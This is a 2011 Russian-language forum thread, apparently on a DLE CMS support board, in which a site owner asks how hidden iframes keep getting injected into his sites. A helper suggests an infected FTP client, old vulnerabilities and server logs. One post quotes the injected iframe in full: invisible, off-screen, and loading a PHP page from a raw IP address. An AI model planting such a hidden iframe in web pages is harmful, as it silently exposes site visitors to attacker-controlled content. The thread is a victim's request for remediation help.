sunca 0 Опубликовано: 25 апреля 2011 Рассказать Опубликовано: 25 апреля 2011 Несколько недельназад пролези фреймы на все сайты как дле так и на других движках, поубирал... сейчас снова сидят, что можно придумать? (Пароли менять не предлогаем) На дле вообще ужас прописываются и в mail index inc data файлов в 10-15... Цитата Ссылка на сообщение Поделиться на других сайтах
WWW.ZEOS.IN 1 161 Опубликовано: 25 апреля 2011 Рассказать Опубликовано: 25 апреля 2011 Если ваша тема начинается с вопроса и вам нужна какая либо помощь, то в самой теме в обязательном порядке вы должны указывать ссылку на ваш сайт. Если ваш сайт находится в локальной сети и вы не можете предоставить ссылку, или вы не хотите публиковать открытой ссылки на ваш сайт, то отправляйте персональное сообщение с вопросом в службу поддержки непосредственно с сайта http://dle-news.ru/, вам ответят на ваш вопрос в персональном порядке, в случае если пользуетесь платной версией скрипта и обладаете лицензией на скрипт. Если вы пользуетесь демоверсией, то вам необходимо разместить сайт в сети интернет, и только потом обращаться за помощью. По находящимся на локальных компьютерах демоверсиям никакой помощи и поддержки на форуме не оказывается. Если вы не указали сайт, то ваша тема будет закрыта, а аккаунт на форуме заблокирован. Цитата Ссылка на сообщение Поделиться на других сайтах
sunca 0 Опубликовано: 25 апреля 2011 Рассказать Опубликовано: 25 апреля 2011 Автор Если ваша тема начинается с вопроса и вам нужна какая либо помощь, то в самой теме в обязательном порядке вы должны указывать ссылку на ваш сайт. Если ваш сайт находится в локальной сети и вы не можете предоставить ссылку, или вы не хотите публиковать открытой ссылки на ваш сайт, то отправляйте персональное сообщение с вопросом в службу поддержки непосредственно с сайта http://dle-news.ru/, вам ответят на ваш вопрос в персональном порядке, в случае если пользуетесь платной версией скрипта и обладаете лицензией на скрипт. Если вы пользуетесь демоверсией, то вам необходимо разместить сайт в сети интернет, и только потом обращаться за помощью. По находящимся на локальных компьютерах демоверсиям никакой помощи и поддержки на форуме не оказывается. Если вы не указали сайт, то ваша тема будет закрыта, а аккаунт на форуме заблокирован. один из сайтов endem.ru Цитата Ссылка на сообщение Поделиться на других сайтах
WWW.ZEOS.IN 1 161 Опубликовано: 25 апреля 2011 Рассказать Опубликовано: 25 апреля 2011 Не нашел я iframe на этом сайте Цитата Ссылка на сообщение Поделиться на других сайтах
sunca 0 Опубликовано: 25 апреля 2011 Рассказать Опубликовано: 25 апреля 2011 Автор Не нашел я iframe на этом сайте да тут я уже убрал и ещё на 3-х вот только как понять гже дыра чтобы больше не пришлось.... Цитата Ссылка на сообщение Поделиться на других сайтах
WWW.ZEOS.IN 1 161 Опубликовано: 25 апреля 2011 Рассказать Опубликовано: 25 апреля 2011 Дырка может быть где угодно. Например, заражен Ваш FTP клиент. Когда Вы заходите на сервер по протоколу FTP, то он начинает вносить изменения в файлы типа index.html и index.php и так далее. Смотрите логи сервера. Или кто-то мог получить доступ к Вашему серверу через старые уязвимости, которые у Вас могли быть, и до сих пор пользуется. Какая у Вас версия DLE? Цитата Ссылка на сообщение Поделиться на других сайтах
sunca 0 Опубликовано: 25 апреля 2011 Рассказать Опубликовано: 25 апреля 2011 (изменено) Автор Дырка может быть где угодно. Например, заражен Ваш FTP клиент. Когда Вы заходите на сервер по протоколу FTP, то он начинает вносить изменения в файлы типа index.html и index.php и так далее. Смотрите логи сервера. Или кто-то мог получить доступ к Вашему серверу через старые уязвимости, которые у Вас могли быть, и до сих пор пользуется. Какая у Вас версия DLE? Думаю вы правы так как не только сайты на DLE были поражены, а вы не могли бы подсказать где эти логи найти можно? Версия 9.2 разумеется. Вот вид фрейма кстати <iframe width="468" height="60" src="нттп://195.14.112.168/124.php" style="top:0px; position:relative; border:0px; right:-550px; opacity:0; -moz-opacity:0; filter:progid:DXImageTransform.Microsoft.Alpha(opacity=0)"></iframe> Изменено 25 апреля 2011 пользователем sunca Цитата Ссылка на сообщение Поделиться на других сайтах
WWW.ZEOS.IN 1 161 Опубликовано: 25 апреля 2011 Рассказать Опубликовано: 25 апреля 2011 /var/logСмотря, конечно, как у Вас всё настроено Цитата Ссылка на сообщение Поделиться на других сайтах
sunca 0 Опубликовано: 25 апреля 2011 Рассказать Опубликовано: 25 апреля 2011 Автор /var/log Смотря, конечно, как у Вас всё настроено думаю в никс врядли смогли бы пролезть. я думал вы имеете в виду что "winдовый" filezilla клиент содержит уязвимость при подключению к серверу... Цитата Ссылка на сообщение Поделиться на других сайтах
WWW.ZEOS.IN 1 161 Опубликовано: 25 апреля 2011 Рассказать Опубликовано: 25 апреля 2011 (изменено) я думал вы имеете в виду что "winдовый" filezilla клиент содержит уязвимость при подключению к серверу...Правильно думали. Проверьте компьютер на вирусы. А логи на сервере тоже надо смотреть. Вдруг сможете понять человек это делает или какой-то скрипт Изменено 25 апреля 2011 пользователем WWW.ZEOS.IN Цитата Ссылка на сообщение Поделиться на других сайтах
sunca 0 Опубликовано: 25 апреля 2011 Рассказать Опубликовано: 25 апреля 2011 Автор я думал вы имеете в виду что "winдовый" filezilla клиент содержит уязвимость при подключению к серверу...Правильно думали. Проверьте компьютер на вирусы. А логи на сервере тоже надо смотреть. Вдруг сможете понять человек это делает или какой-то скрипт звучит это все же как найти иголку в стоге... Очень уверен что антивирус тут врядли может чем помочь, ведь вредоносного когда никакого и нет по сути как для антивирусной коалиции... Было бы не плохо увидеть реально возможные закаулки для этого кода. Цитата Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Присоединяйтесь к обсуждению
Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.